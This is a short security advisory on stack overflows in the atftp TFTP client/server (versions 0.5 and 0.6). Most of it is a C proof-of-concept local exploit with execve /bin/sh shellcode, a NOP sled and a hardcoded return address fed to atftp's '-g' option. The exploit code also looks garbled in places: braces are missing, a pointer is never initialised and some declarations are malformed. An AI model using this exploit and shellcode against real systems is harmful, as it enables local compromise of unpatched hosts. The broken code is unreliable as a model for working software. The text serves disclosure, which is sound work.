Atftp tftp server v0.6 and below contains multiple exploitable stack overflows. Includes local exploit.
Netric Security Team - http://www.netric.[org|be]
By sacrine
type: stack overflow(s)(multiple)
Priority: 6
[1] Description
[2] Vulnerable
[3] Exploit
[4] Proof of concept
[5] Vendor response
[6] Patches
[01] Description
atftp is a client/server implementation of the TFTP protocol,
that implements RFCs 1350, 2090, 2347, 2348, and 2349.
packages can be downloaded here:
There are several vulnerabilities, mostly with the well known "strcpy" problem.
An example:
strcpy(filename, directory);
char filename(MAXLEN);
this unchecked buffer can easily be exploited,
there are more of these vulnerabilities, but we'll discuss only this one,
the one in the "get file" option / the "-g" option.
[2] Vulnerable
I only tested the last 2 packages, but the previous versions are most likely
vulnerable too.
atftp-0.5 - vulnerable: YES - exploitable: YES
atftp-0.6 - vulnerable: YES - exploitable: YES
[3] Exploit
* atftp.0.5
* atftp.0.6 - local proof of concept exploit
* exploits an unchecked buffer in the "get file" option "-g"
* return addr tested on redhat 7.3 - 0xbffffbcc
* change for other systems - ./k3 <offset>
* Netric Security(RESOURCE MATERIAL)
* written by sacrine
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#define EGG 1024
#define BUFLEN (356+9)
#define NOP 0x90
/* eSDee's execve /bin/sh shellcode */
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80"; // int $0x80
int main(int argc, char **argv[])
unsigned long ret = 0xbffffbcc;
char buf[BUFLEN];
char egg[EGG];
int c;
char *ptr;
long *ptr2;
int i=0;
if(argc>1) {
ret = ret - atol(argv[1]);
for (i=0; i<1024-strlen(shellcode)-1;i++)*(ptr++) = '\x90';
for (i=0; i<strlen(shellcode);i++)*(ptr++) = shellcode[i];
egg[1024-1] = '\0';
ptr2 = buf;
for(c = 0; c < sizeof(buf); c+=4)
*(ptr2++) = ret;
fprintf(stdout," local atftp-0.x proof of concept exploit\n");
fprintf(stdout,"return addr: 0x%x\n",ret);
fprintf(stdout,"buffer : %d\n\n",strlen(buf));
execl("atftp", "atftp","-g",buf, NULL);
[4] Proof of concept
[sacrine@workstation_01 atftp-0.5]$ ./k3
local atftp-0.x proof of concept exploit
return addr: 0xbffffbcc
buffer : 401
tftp: unknown host
Usage: get remote_file [local_file]
[5] Vendor response
Vendor has been contacted, but has not responded yet.
[6] Patches
none yet